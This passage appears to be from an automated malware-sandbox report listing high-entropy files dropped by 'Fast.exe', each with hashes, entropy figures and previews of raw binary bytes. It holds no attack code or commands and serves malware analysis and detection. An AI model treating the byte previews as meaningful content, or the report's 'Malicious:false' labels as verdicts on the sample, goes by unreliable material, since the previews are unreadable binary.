S.E.I.P...X..|g(,hI.\qd...4......b9$..b...N.G.u...[.wN.....p}.}....j.Ca.z..x`.."..1..??.._G..~O`.....S...9\.'.E.Y.j...+..oS.4..0.J...d.6.....c...p.....,..^'..1.......h.d|"...+.J..}[.......2..F...:........?5...B=*....B..E.z...c....g_;p|.7..>Z...H.ly.G..~e...|.=6./N....9.B..,..3../.,..3.w0.T..W3........P."......Jnw.=.....uo..c...n.....2.E.@i].Tx......I......D.4.g.M4..k.P....W.yY..../....9..TD.'.o..m...BD.....MkO9x6.,..=D..B....t.3.l.m...m...2...<..,..GM..8.n{.g......gQ5f.W.y+..".D..:..).........I.1.G.E...D.t.PaW..T%@.6..4..e..>7.\|Af]$H=..*..\^~.2q....]....xR..L8...l....c`.b...1})..E&JY...j._..j....Q..x..E.>...w.....5..t^...'...a....{..i.......,....4.X...q..o6.....E....-...*.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11634
    Entropy (8bit):7.981613021233144
    Encrypted:false
    SSDEEP:192:ZNEchi9mE/gjD/pTR6j17kRMmsn0Cv24lzLWZANaNnG+SyqzZ4ze/F6EdA:fjhi9mEe/pTRbRzsD2YzQY0G+5FeNFdA
    MD5:962460FB270D6EFAF939DBA66B79B0ED
    SHA1:2FFC298965799CD61920111168BA9DC92948061C
    SHA-256:390F29B323C21C862CFF12489053935DB175291D98519AA3E072E19B2FF868AA
    SHA-512:33B6D30C2FF343EAAAAB1A2D4549FDEAC8B877529F8A81A5EACE394CCDDC277BB0DAD5D0C0F0B9A6DDB3C30AB85C27CFDADCFD7D25FB49A18D6BDE709CFDC5E9
    Malicious:false
    Preview:YK.0..[.._.j..&x...@./rT.Sq.>.R.P..O.*..........m..8.Z.%..}.)......b.#...k.|....a..>0.......).p..l...(.F3W-u...w...cD.OW..`..o......&s.w..2..r.!h|....z..8.EB..4...V......,O....G..A.T.....ye..dC.jKw].Dqd..&....3..u(.'^.G'.).>....f!|.5. IyHy.TF:p.\m.6......)..Z+v..V..8ucG8Y.}!M!..-.,.R>..EB.X..Q],h..|.Rt..k...#Ws..\%...F.....c5O_wM.?.....3.J.....t.g.<'.Yb..}..w<%...9.P.....3.6...........k.-.K....F..V1.1-8}e9....-..jg..~o.Vi...K......*...d.-;W..N&QY.."P..."WP.!.,..2O.z3...o.u.L.a...O...Z.K.......:.\...L...I..e..Sh...;R...D....A../.f.:.5...9.(...N.......;.*.j&zM\.e6Q7'..J.....~...'-.....K5...t..........E...0....P..K.K@.<...G[<....ex.Uo~..v.[..@O....K.2.1...#h.&.jk...;2.sE............<'_.-......m[.R.,.!f3.S.?.QJ+.....b...2..%J..U".2."......?1P....7...0...".`.dR..<......^..p...H....[...........Dz.X._.......i.....m...[..%.......1..J.AG^...jv....W@.0W=X....@....]..qG....[....-.el..iOL.+..SM.mB.....>[S...raA..-=..H,.....'.,sT.]..q...0..6.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):18098
    Entropy (8bit):7.989995835799088
    Encrypted:false
    SSDEEP:384:84ntDOqNCmro79wUmWa/w0vVSyPrPuOekNgmlxTevIvhteA:8GHVr6uo0NTmkN1xachAA
    MD5:F0DFF1E9BA664669D038F8209B525B0F
    SHA1:B0589627023BC6E78AEB60F553F3B3806D8534B4
    SHA-256:48E19364AD9DA86837DE3F88CCFD02A3052244A084BD0C2890068C6C66A1EAB5
    SHA-512:5FCBBCB2B982D858E144C89655C85D177B8ECB59B6DC04C306434991125BAA16D188DA0DA5BE829DB911ACE6F20064D12313636C9072A80F795E344E46D88466
    Malicious:false
    Preview:.1G...-.9.......jCWzW...-.=.Ku.pZ.Vb.t9..j...w.g..Yt.....c...-...Le.#...j..m..:..V7.IJ......QT........V+....Pw.....D..zO.0kC..x... ...,.7MZ/.).l.<.rH>ef'S....EUUZ.6.P|va....Y......{(5....bN..].Q...*.gKp.P.+8CJ..:..8...<W..s.x..d..!N;.#....x....w..)p;0.Z6.........c...@.')..{.....2)%u.B. 9.T)B..$9..&u...x.v...9t..;......-.n.#..-....)*NZ....;d..2.a...U.B@*.U.F..h......1g......`.9..SA.3.....a"..|WP..\..W.{.E..d.r.HQd...-..O..;..s.......ak..br.^Q&n.[......7......n..i..uKZ.rw.+......c[....f...C.r......|q......].W...b/..{.}h..hmv.`g......)!i...D..Y..<`...3...s...j.kc..6b.."+$......CM.......D..I.AO..J..w.....\.7cy....b.1.W.....k..v.)..3&..A..L.....D..X8Q...0?r.6...^L..|.wh..q/..K .t.h./H..S....A..K]PI..YL:...<.q_[..CO.....r...R...N.....K.\X*.k....k.d.^....a..W.j..,....)rt...#..T*..JdV.` .`..9...,..G.....v..zu.B.{[.....s....{...o....,.....l2.EOA.FP.{> .."....p..4.......h........(w.\.4s.H.}J;......v..v..y.."..r........a....K....G>.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8850
    Entropy (8bit):7.974865020979707
    Encrypted:false
    SSDEEP:192:ZQPO4SUpOljf8W/9kdCY8cVlOT9m5q/1W3nBPeEdbTA:bUpOlQ4kbjmwU/ovTA
    MD5:9E6AE00E37C4C8C6BEF2788CA3C7C2EA
    SHA1:D4081D0378F89C1F80E9AC786C599B7B9EACF4C7
    SHA-256:2D09709AF87ACCB14C092A842B5091041BA16B8C9CEDF4D0234AB580B88AF7CE
    SHA-512:5C58F2D2CAE698FA0C96FF257E588A3F504193CCC1C861BF2700D9B0FB2FB9DF77CFDD148E8CABB10B94FE9CCA8866AB3CDCB8C2F2E4DB5829A787E704DF97A5
    Malicious:false
    Preview:(...<.~.......:<..D....a}e.3....Sa....*..6J.....lS......:vT....RL.....bp..R.LU....q).....,.....]...M&.|.uzd......:.>]B..GT.LE...a..a..X...........3".B.-c.......=.HQ.....GMe..v.....6....S..czZ....x...~...R=...1..v.....<..Azpq&l>Oe.._..Bb._..*:y.Q....c[.E..h.k...yM.h%...{]...|X......h...C/...5.G.y.+.GJ...]..4...[.tX......].}..B.K...=."(..lV.. m|.t..\.aro..6(...w.$..>....Ei.n.{._..$.../j...+. e...*u..*k@......q........Jg..0=dz%...RR....L/~...C.OO.p.$....7...}..'V."?.,}....E.$..._3_.;....l..eL..9<.N....6X.-Aja...q..S.||....|R k..!.f9....@.O......@#Y..y...K......`KB2O.j. .[..u.R...}.....>P.@.'..2._....].8.(.-g3".t...&..95.7.8.z^Te.....d...G..9.\. ......l.....P...Sl.2..tI..rk2....O.[FB...e.....H.....k...ony,A./.............7u...+.Hy..l.L.G...@.f..S.U......s*...%....15..& !..Y........w..S.:...q.2?.W.(s-.h=.A..4.l%^U.tJ.Pc}Y.SC....;.lO..H.9..;`. ...G..|ul.Hbg.D.@M.Jg8..Z...|..a..@pq.hX.Tm.6.!.F..C.i.7.}...,.$.~.C.wQ_........1..CL.R..,.Y....
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10418
    Entropy (8bit):7.981593327853759
    Encrypted:false
    SSDEEP:192:ZQCZtQjZWBanBtGdLQ0eOSEYPvSAHFFskzQST/A+1Ro2JFStyLhGEGXA:4jUwBtG+BSgvblP8ST/b1NF8A
    MD5:5941B01962A37F0C78A5034534B04EDE
    SHA1:914473F7DCA1CAE42B7E23B134CF69D5E5289A00
    SHA-256:47009519ABCBFEFEFDDFE32F1D7C977260D922D32792D1EBDA50B0E86C155440
    SHA-512:FC4024D8ADC70DC7AC811A94356FF4B7640465A00067549BFD89454B31BBDDD64F10593259768C27FF3BD7EBC6FF0A5667E58642E9E5405335E37277E8C729DD
    Malicious:false
    Preview:..;.&......$ix#}.0.dO..%...|.U....[.n.*....-...Rq*SB..m.{.......L...o...........}.....H.Zg.\%F.ceI./k.9...H..v.:..J.nx...mE...2.C.G..!..)U..MDK..3.d8.?.(...r...b..vE.P...L+.F..)d"..dD.).fI.|do..w~.F.>..k.1-Y...a........'...$Z8D.,..q.L...'.D#._^.v.S.M..%.......R]0....0.F.Xy..m8W)pt.L. ..@..../.H.6<...+T.._.......pO~A....KTd.......x{..\.|...K$t....U.k........c|5..@Ej1...w,.I..2.r..;.4&.O..9H../.J.~.....o...w...E.A..1-.hO........~......;x...=..j]cD...R........0.......<........T.....\..1....d3'.......K}.........S..E5....]...2k\+..Z..<s@.7...bZ'L...`.{...I.p......E....4>Xl9.CR.,.h:.w.............mC.._......Y.A...e.........(.......$i.,1.B.A|.<..=p:...W..hp....O1....H...yA(..M..%.....T.T.)...w...27.|.q./.._r._*..N.......:..>=...^U.:.....Dj7|6+.....J....$a%:.7.u...o.G.r_i..&.B_K..i..2..m..M.....D.vC..T..r..3..j...X.........65?.#..c.K. ....t.|(...K.}...$C.#...B.w..p.h...{N.. .!A.Nj.\\.O[.bo~\L.t.<s.M.6F.{.yd........qS.......).w]..TH.p..~+.ZI..O_.....V
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):14370
    Entropy (8bit):7.9874640015807055
    Encrypted:false
    SSDEEP:384:gjMT8o1BCkC6cCJJP3+A+iW3qpu1ZPahZbgPDiPM3A:gAT8oPCicsmxx3OuvywPDiPM3A
    MD5:4352A0F91F75B8B96FE53A4CBCAA8732
    SHA1:84CFF6833E8F1278F6DC9EAFE88E4FA03417451B
    SHA-256:FAF8C252B34504E1204236165ED19F2B6D65F3C8EA105B33DD0302517ACA421B
    SHA-512:659A6855C3186D181C422C235E1B7DFBA52155B64E4E5B4672F3C2028FACFFD906666FF7743E30F519283B52CF461D56985EDA478BF7318334D72348D51E5A03
    Malicious:false
    Preview::.y....../{)t...d.o..n}.u..pn>..............j!.,..*....yA.^.....p..u..}g..R........"3.Kv..y.@.Y.....J}J..?'.L...U...........h....[......q}t-.3F.WNK.p...mI...M.....".R.xG_..-..trF...*..Tk:.....".\T..[%..f.X...^..bM6.O..6=....H..y.>;....Q=.h...D.@.Uq..#..I..V.......U\!9(i...........]/h....^..#......Y..Y.2m..\~.5..cRJ...'..z.P.7..[...).C.....+`.......N.\...NDL2).....E.. ...Cv....g..D.-...8<.%R.@..?./(H.AT*.Ci.:.......xXtf.!...!....s.{..q>...Pg..g.._...[...,."H..|.I...0...okq*.k.....[... c.[-q..V.R%.........4'..56..]w.j..`....+.......l..m....W.....n.z%..Y......5q1..6^?o...@:.Z...H......xL1]..C.G..yE....H..5..._.0.:..~D.D.H*7#.;}.h......Y...d..-..)]..l....la.g..b..$.F.@..f.;S.:p..P^......^..q7.u\...~..Kkx..T.....k...~.8...N.2_2wuo~5+.sJ...+oI..E.J..z..{....-..n8f$...x.8.l.'2...M.+&.%X..qp.c.C... .R..=&.........O}..... .6<#t.].v.FG..+.]Y2 9.*.I.\..-.W....0..,.W......j...,..d,.h.>.X..a..h]..V.kJ#f..}..].Uw_....i}.......P.8D......
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8898
    Entropy (8bit):7.979225861261048
    Encrypted:false
    SSDEEP:192:l3ddzSbdr7PT5IwMOiE1+cLF/H9XieEPL2HiFmT7/MyOA3KWC+8A:JzSbx72wQ3cLF/dyeEOiA3qJ1A
    MD5:1F305CD6CE9D197E315784BABBEC4A5E
    SHA1:4CCE5AFD27FC3C1E6BCC633A81B5E535E2553AD7
    SHA-256:F016147E2D8EA4EFBAAB69DC945F9CBD3F1F756D836E752F70703D382628BBF5
    SHA-512:330179202FFC4E52767997AE2CBC2B8D1C65BB7CC9A57C02B08579DF9B16969C65C73E884D8812C74B645C75AA92F3B888FB4001738C895A78874BB2DFB69AEC
    Malicious:false
    Preview:Y....JSzp..b..Y.x..>......R..=..B.fJF.%..E...........Ht$_s.....[.k.....y.....~.z.=..aD....dg...!....RV4....VU?..S#.N....4....9\.0#...#.9...v.h........a..o.d....H...$..j....H&.&.7.=v..|{.........}..e.@SJ.`kVi.ot......5..-.`....Wj.......E~.....ID.......h........5.JY..k.b@...WR.9.m........({/.W.FQ3.5.0..E.Wl.Z.m...,.C.W.WD..[|........j.'%O|...K.5..% .Hp{~....tf.O.K..`^a(.T.Z......m.F........a......@......9..&..N.J...Z..l..6...c..d.} .......r6,mQ.$...}..J..G2.@.d6.]..m.Y>.5J....%..:.B8.~I...$b....T...j.m..^a[...`..-Y./..Qn.KLS..v.g...%,"..D..."%*..0v..xq......F..v?....|RV..6._9.zE...i....`...-.....3pGu8.P.c.p..<(..,....t.i.U.Z.(..j.~..c....:.I.}.. ...,..~.=`.....:..,....a....}...A.{c......B@...*p...v.p.$.b..N-e..dLP..uR......G...L*.V........|..?..0K.[i......5X..@..........l.^M..n.Qj..p....<]J........W.{..#B5.:{.....&..`.V..y...F..gK..?G.-E.<.).vF....8..y...+....u`M%1U.2...?........m.....t. ..kV.#..]..EUR..cy..x".P1h]....@Z?.F?..=..E(....."..S
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5250
    Entropy (8bit):7.963234593976603
    Encrypted:false
    SSDEEP:96:58o2yXDo12FTXGdM6um5FcxHZAphInzuHaw0E4YUl8t7zbU+5y+vHeA:eyXDo1OGW6fFEHiInyf0E4Yie3Uw+A
    MD5:660BF5D719E11E1C06AEB09CFDCF0A1A
    SHA1:4A74320953D44FAC67486B11A0E18C3DBF76DA2D
    SHA-256:4DE834C85110FDE0B5A22AE5560B23FD6E7CE25EF6B8CFF572DF3CA75E1691BB
    SHA-512:10EA20E11D07BCBFCEB680BAFCEE6B45B9F01D691046936EAD4F8C6453AA0BFA14B8214C294AB3350A66D98BEA4857E20C9903B4124DBC2E2AC22ACEE45F57B7
    Malicious:false
    Preview:S=G....#..0...j.e....^.(.H...T..=X.7.L.U..{fqiY....@A%....E.;..j.G...b.....Z...w..... ..H.u...2....9..1{..*.^<(.k..{..z.......mN#.J..}1x2G^....T...-..W.F..C...:.l.Z.-&.X=.......k...5..dP..g...{W........Yc.G.J..-4..M..q......hx....q..a....4}.([".Ae..EvE.J.|.:....)...~.JC?.`#..1...xiJ.w.....uu.X.T;>(.,YE......Q\...D<....\^..j.:............{..j.[JV.b..;...an.e.9..i.m.,l...wAg`*y...8.."06....z..Ebp.b...1`2..:...Fss.Q~...|wq.5HaxW/..x......,L.}....B..w~...gTPt.n~..0J.I..t.o&..IF..;.k.*...4$.#7...l.......E..Y.....bda..F<=..z.Q....B.*..+n.A^...I......:.R+..N>.......I..E..^.H.i..'..@.-.|..'&Wmy...gG.[./..M..(.......)+7y'.B.G!...7j.Y. :F^4..F.R.om.X....}.z.:.X?...T.Z...:..\5a...[.p(..).Z3O...7..l.3.+#...s.JnXF.zQ&.1..i..o.HHc]\....bp5..M@7F.6k...I.#F..x..:2..{j."..,.`-.....8.f.....wi.Ma....Z4..-.....l..5S.q<@......@.0W...kwSs.v0...+..0RVdrX....#=....q..F.w/.).g..}.......0...E.`.S$%..ArfLn.............3...i8.+.....9.v.S...0m.."....w...)...2...*L....
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:Sun disk label '\251\272KP\204a\376\240Z\353\353\321\314\222\262\353\260\220\004e\207R\032\023w\214)3\216\317\011 \275\277\366\003 F\225\277ea\245\270\375\003\2448\335\233on\025\005\217\220\313U"A\247\211\373yz\351\331_\200\014\336\010 \275\277\366\003 F\225\277ea\245\270\375\003\2448\335\233on\025\005\217\220\313U"A\247\211\373yz\351\331_\200\014\336\010yz\351\331_\200\014\336\010"3Ue9\303\254<_\355\030\265\277\352\361;\00684J\311\336\230\227\324\203T\263\032m4 \266\241\341M\265#K\315' 8125 rpm, 8779 phys cys, 15291 interleave, 23137 data cyls, start cyl 426938426, 620664674 blocks
    Category:dropped
    Size (bytes):8978
    Entropy (8bit):7.980362113371765
    Encrypted:false
    SSDEEP:192:WjpfJqTZOQs9MrL8M/8+r2Oeo7Pjy5r0kB0KZcf1Fdfp7S1NBLquSj5OuzA:ypfJOZOdAL8M/96o7Pjy54kBJZctFdUb
    MD5:CBD5BA94375C6BB4BF49FCD0AC1C0637
    SHA1:17C3F76BE695C2AE918BA70EB6EFBA5269A27F53
    SHA-256:17744DC03119048779F7E45E9F7267AF7267E9701086CD6FA936562404C30502
    SHA-512:3467BD779130E61AA106F36F21C3584E9B6650191D566E34EA96FA99B95354699A39B55CE95F74F89F51EBBB57A5CB932D576EBB4A265D45C767C57DF4490243
    Malicious:false
    Preview:..KP.a..Z.......e.R..w.)3... .... F..ea.....8.on.....U"A...yz.._.......h...4.T...BP.....)."3Ue9.<_......;.84J....T..m4 ...M.#K..n ...]....C}..>.l.Z....O...IE...8W...d...J.ieB..D#.x.Nl....2...5H......0.r=9..)...d.m3...St..9.N.fr]...D.....|.K.7_..C....1\h.....L.....{.*.y..!.a..=....2Ct....'.....d....i;.8=\..D..'BY..#Wt..K.?^....B...K..2G.....q3N.O..Bj3..jp...Z..aw..YD..^.R..K....X/....I.p.6..!\.[..).nCO.3....x..F_.Mc....fq....i........ig.B..j4,.F......K"3.wh.z.;aZ......#..:.r.b..$....I...n.-....G..$...Q..|.z.m...D....BZ..Z....D;Nd^3.....p.BI.y.|Su.j...'..x.^.h}....A....).`4.`.j....t.o..Y;.9.`...#.l^lt.P.(.VJE.'..J....yw...."mu!..[^D.....<&.b$....]p...P...._.{{..[...X.5.|...+UEQMD..pu&...&@j.)..^......B....z.H....).).........%.....Y.."=..H...][.j..).l.%$..]8@..SoFH.D.R.`...<...rU..{1..&..eT.|.T..a.u..m.Vt.;.)!..*8..u'.*...wx..p..cR..:*W.....A....HP.b..n..u..h7...3V../0...._S..Q..'%.h..-y.''...._.E.e.>^>...~~.m.$M.^..r.6.....b.......2..Q..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9986
    Entropy (8bit):7.983502395736548
    Encrypted:false
    SSDEEP:192:M45xaX5z9HPQBaAp7wQu2Zi9xAcL1IqJNVPqft3WgAyi58A:MKaX9+BBVu2+xAA1t3PUnAx8A
    MD5:F8358F51A698FC4FC8526069487B0F91
    SHA1:05F32E4CC3E65A576AE655A2E8F27BDF2E72DEDB
    SHA-256:5518C1D05860043C21C73CC7809E6222424B2132C677D76A45A5384D08165D94
    SHA-512:7E9A3121B96091EBEA67D9F26FE89BDD8EB4D8B46325631BFD2ED56FD454C65F7980A872D4F81DA1EA48E970470F8CDC8515610A18402A2A171E8EAC9B31600C
    Malicious:false
    Preview:;......q..!...5.J...T^.........F:}....&.L>.P.UXr.e...3ub.b#}U62z....Ux.|&.N...-.......P9.....Y.....#Y...y.../I..P.."'..;.[.m..W(A.w\."s..p.W$.P..Dj.,m..n?.F..q.y.h..7....Z...&.....L.X.C_.../..}..M.R..m/CM..tQw..m.rl.@(......Q.A.Q.g..,...u.2bqJ1.P....:W.....s..].fB.....R..F..oHI....P.a..3AN..+{.'..}w..MM.3.....#..2{......D.....T,a;D^.J....4.]...d.k.....M..0d6.<.z..v.z.LV....U.2.<D.=_.t..."-...5..".[.T.K.i...q..)..`..p..rLdA@....H._....a......._ Y..Zuk^!..T-I...;4.y..U..lw.*.\...*...'b....IJ.t..(.[>....l&Z..W...4.eO9jx^2S..S.q..I....!'Pp..njm.gr..K.xC...-H).O#.&...[*..Y`..A..Q._<..|..e*.....).Y}...|P9..)W%.J.rN.b.85.v...7.M%..Lv.a.E*b....@S>..=..C....d.`e.....~.......R.h.Z...-..?d.. .X.{aov..&S...T.....;.izL"3,....+...THN..x.n.....X-.T.....U>zmab..Y..-s<.6.&.~....Eqy...N...P..+.Eg.......{, .[..]....v......q........^......._.).7G........i...#.wO!b...5."1\..RY.).Y...*./A...n;}L.6v....#jd(T..N..EZ.......f3I....bil.Q{.g.Y{y...Y.#..........f{.$.t......
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12450
    Entropy (8bit):7.983451637957112
    Encrypted:false
    SSDEEP:384:IRFy5WjKZB2xRwJmbWrUtHvx5+X4GNiZA:IPy5WjK+xGJVUwX4GyA
    MD5:9DB4DBF00BBA0AE51F3698B04DC898C3
    SHA1:8C997F7FE0FB414A3327EAAA532429B2D17A8ECA
    SHA-256:DEDB1EC9B770D4DE1BC0FBD0D765A23C75CE7AAACB476BCFBA1EFC1229A1DE8B
    SHA-512:925C83BB5B68FFC4F207F24B81504C7DA5218C2F13685DA565F0F1FE891376D1B9103E072A068B5FEB39E3D6910CB6DD4D3EFE58476BF8BD64DDDD7DE98B69EF
    Malicious:false
    Preview:..).R$...dd/3........|3_...]ul.U.F}e ...m\7_.......P.~9..x~.....z8.".+;..9......%..<.2..n."'x.5H.....%...K'. ..2.N8.?..@.......7K..S+.=...........w...#quj.4.$.B..!..........2;.=}..R.....J.h.=.7g...@.NO.....U.S..u...(qj.]..H..~>o.?.....i....6...>.......U..,."..>.3\7......u;t}..sXU...tY..GhT.eM\..,..$.e&bW....J7R...}r.....'..?.*...b...Z...4W^..:...=W...UP.:/..4..u"..4w.G.`&) ...5..<..".....PnCM.l>=.j=..Iw...E.&.$..` .2..M&|h>....Y..{......^..fu.y...>...i}..|Y..V.........k.6...+.nTw.v....-)...Q`..:...0f.}.n..jg.:....1i...B..;.O|.....`.&....&.f.e..y$..d7`.E.p..A....GZ..o..p..9r.r.......s.!.....C....t.j.u.(}.V.9..!...:....N..5.~*...2a.88.d..p.g.......7.5|t.%...............n....P..Y...1v.6.O.....eU....lC%.;.2..j....h...oa.D..!....|..9..K..p....h..IP]........|"......AA.>......2a..$.9...=z..k....8..=pi...[!....................+e Y=..~6......Pd...s....v..vT%..\)....1.......se.f..LG`b...%N.c...9.....4|....c.;........=.;_..m.!..yP...C..DQ..Bjl
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):18434
    Entropy (8bit):7.988732637873703
    Encrypted:false
    SSDEEP:384:Kun0FHez7MD7Qcb9G6JlPKpuMZJ3Y2LP/EUXcnI8ZwdpA:tPMDgwP6uMZJPLP/EUXckA
    MD5:E3EFB47B038657B59CFF85738A1D26B9
    SHA1:38A4A102A31B9798F75C8151B31DDE21B71A9B44
    SHA-256:9CB78E04BB95B60F2DE4BD17037323FC48816EE08539AA3C86ACFC17650195BE
    SHA-512:2502F12269DBAFD390E3DB4976CCBF7AB8470DF1CD5DDFFF6D7EF18D2280F6C2BC7D8C620BF41904C5E5562BEA19D0E998AD79523EACEEDCD1039BDEF26D4464
    Malicious:false
    Preview:..P....../.......G......w....J...,.W..>.+....JO(..S.@...|N.0.I..K. T.....4..Z.{1.....m.w}..8j.M.wkw..3...A.~...9..0.....Jf..qu+.).\...{.]..7.......t.vu^..^.m..a.....U.l.r.*$.G.......=MpL.8..@68...g?0R.Ju....h......R....;..0>i...g......2....^.[.k;..vh..&.....1.2lK.a..F".....W.I.L6M.6#.v.Dn.Y?+..h..M..,G.....[.bOL....;.7....:2..^....\...V....A..VR.r...{.1O}C.>ug..DZ..e/....PnX:"...$ ....Hi5C..H...7._...b}..B<N.Gt......W.....'..B.....[....e._......\...4..(.......@g9\.m. .i'...a.g..|.!Z..{..+./l...n.LI'.WX.....*Zs. ..k.X.....G..Q_..{.Kr........P....9.j9..A...j7:.....jK=.....NF.C...Foc.B..D.9w.r......P.c..g.<...x..S.,.k..r.UQ...i.9.o..x...D..m....uy..;.A.oL+........IU.\.w.'$2....\)RPy....p.V{4......=.W@a3f.....2C..c.~.Q......[Hy.s*..........q.E.l70.,..!.........M..G.2_.[.n.X{..&....#..jokk..].ly.d^.....7.&.~.w....W.s..-.]3eJ.ZI..Yk.E...`..aw.../.u..fx....9....W.1.&.y.....2..r...=t..\....9...iL...cR.w:....4....I.+p.>y....2.(....b......}
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8338
    Entropy (8bit):7.97583760669792
    Encrypted:false
    SSDEEP:192:y58wvYBtWgHMT7/qhxDSSB6fkjql5ST+EJSs7FA:yfvQkT7Sh1b8VQThJ/7FA
    MD5:34CD4B1383A4D962B3DC0093E9D0E68B
    SHA1:432B3E270BEB0DEBF4013F0B656CD6E7255B1B08
    SHA-256:5501733BB43733A2396E954880FD4C782B2A84DB51C0A5D023AC9360D234C38B
    SHA-512:11E4F652E69824C74A7EF1E7115704395E58D1F6110244DD381DBC9FB490C1A4D2B5BEBD610792CB82AA6C2C7D0E6DD61EE76738443D58559AE2E6CB44E3F108
    Malicious:false
    Preview:..[.MO...2.X.7.U/GW.^..cd0:......2......5a.Kis.....5....Ax[JVGR....?F........z..<.e...._..a...".G.+.Ru..z.Z-....Y..#..q3...1c..>P9...*.^.^.......i..@.4R..........p..*".u8..,........*.0.J.F...<.z/Y...BD8.{.........[C...L.C...?2...%O.l.;./....].....Zo..l..(Z.v.m..%X.&iV.|...L....|...[.zQ..0..!.h]I.+.F.rZ..tx(*.{q`m..,.~t..j..2.:.Z.#../.KJH..p..l-o.-.E.b[B..4>..v...CKo.&`tq.y.o.....at.[r....I.....'%.......H$.f.pDE.:..d...O1$.Ml.0t.L6A#.{..{..o..:N....\w.Q....5.gz.......,.5.7...pb x./}XI.)........tw..m.<j].._zIS....:.ni[....p1..l|.H.U.o...>..Q/p..G.t..d|.x ..."...(..R0.D./.....n..8..T...;..=.....Tp.;7.|.H......V{|j.G.O)f.R.z..;-..(.ip\.kx.....`..1/k.........8.=.M.O.....m..=.Z..hq=6s.....x...z6.....2.......}w.k.......L.......q,.8......t.'...[.e.?....l|p...+.[f...O.."40.`.s.......k.L.7...-D.1....PD...3......-.5.........uF....T...D..rpA........$....Z.N..........Q.lk.P2..nk...9..aN.@}.>M.M..U.....W.@A......ZF~.`......%...N..[c......
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8818
    Entropy (8bit):7.974521027709422
    Encrypted:false
    SSDEEP:192:4jh4OFMGud4lzFx1aymAiy/6+VTeI3tT2LdRSyb8kdjwftbA:4Sanumlx8AiG6+5eIed8ybPdAA
    MD5:954B268B797441F20CACE9B05D0250C7
    SHA1:55B5ABE07F34DF4F9ADBDEA23B0A169529883220
    SHA-256:D9830BC8EA28C5CC4DDC4B08E24B3EC48F221E68D150F4F7EFC7B87F7F587E14
    SHA-512:563AD6610023622403AD8C9BBC273E2EFB830CF4E00AB1BCCB9542826CA7068931EA90765BA5EBACEB6B429FEF97F59AA2F49CDB7C6B63C32079138CB0AA6264
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10962
    Entropy (8bit):7.982109126307625
    Encrypted:false
    SSDEEP:192:cO4TeZD4/7rekALNrNhZAFFCeICeeo9t9YIc8caIZm2B3FAwBFyLw4hav4IKMrNo:0cD4HFALNrNhZiIjht9YIGD3a4e4rA
    MD5:44B27F7D0F1FBA4F50FEEF47EB635EB3
    SHA1:26F87B0219FC94C05221551B97EF83E21B11803C
    SHA-256:F59800EC9E22BB2F82272B2AFC7C3B42FF47C26A17459465B3507EEA6937C2B2
    SHA-512:744E3B0B5E44212A65969B0F14C602479F7572B6E440A7580CC40CFDEFD53FA9014E0FC8B91F9995CA048583C25BE35EA8A640ACC1B5A3691ACE5F70A6BAB67A
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10530
    Entropy (8bit):7.983158349006109
    Encrypted:false
    SSDEEP:192:bqZ71RsqOx1UHAP9Mvidrws0BaMYL6KU+XZKjukU57eGPZHJFuy0/OQ/kA:0RNOxmHUsBa/U+XZwQ5Hzi8A
    MD5:0844E66E2718FC1E2F86B97A919F6495
    SHA1:B2C9C90C188977375D0434A43A525C646A867541
    SHA-256:3D20554028141B077089874475930DBD46A2F1F1ABB57028E75C60AC5FFB7D2D
    SHA-512:22097B104543AC89CDB5645E43F2CCF61D2EEF960D7C0F6FEB2A2EC5DC46BC772E12ED56E005049471CED47951C965F4F2F3800B91362D67D3E897D70C514286
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12594
    Entropy (8bit):7.982429467701627
    Encrypted:false
    SSDEEP:192:ulK2UGI/plAlcdC1Uye+FrPl51AOBJJvo7LtDn6LTqxmC0d2/ASdySDEtQ:0K2sphAUuPf93JvcDmC0I9EttQ
    MD5:BCA13B7D9F2512D18F7C010D49A951C1
    SHA1:3804D58C752CE9CA48AF4085C80AAE147C7DB9A9
    SHA-256:963946DA9F77957B0E04E1FB93D73B55943969B8B8B934E5F326DE7C05875148
    SHA-512:E113DB9E0A254B26FD7BC1C14AB1212A3ECACC2B5BEEF7F1CB45C9E47874FACE684169340ADA0C7CA7BF99FF57A23D40D024040128F25F83AE861E9A8A52A090
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):6002
    Entropy (8bit):7.962511334239594
    Encrypted:false
    SSDEEP:96:pWs7PaboRJUus7Wy8NFCNAvZ0M1AdgZqoYC+MKgxTutAJhCZZgfQXFiofpv+B/A:pWsjWoRWjSINAx0MQofKgxTutUcZgYXb
    MD5:CC86559FA9D516B4CA81C84D01ED4792
    SHA1:7D55572422E90E25E0818AF3E70F606E61F3E582
    SHA-256:5C5971CC8B7F963955CB906BC3CBF70FC4DF42A95CA9A95CB7BFEE4A59AC9B03
    SHA-512:0E941DC3CB8B10FBD9D6BD969F47F0B68DCE14100B6856CD9A91D67593571494DA909858069288E72D18B71C0135F9019435C61C9D05A2E0B5601EC055E6B1B7
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12690
    Entropy (8bit):7.982478511791445
    Encrypted:false
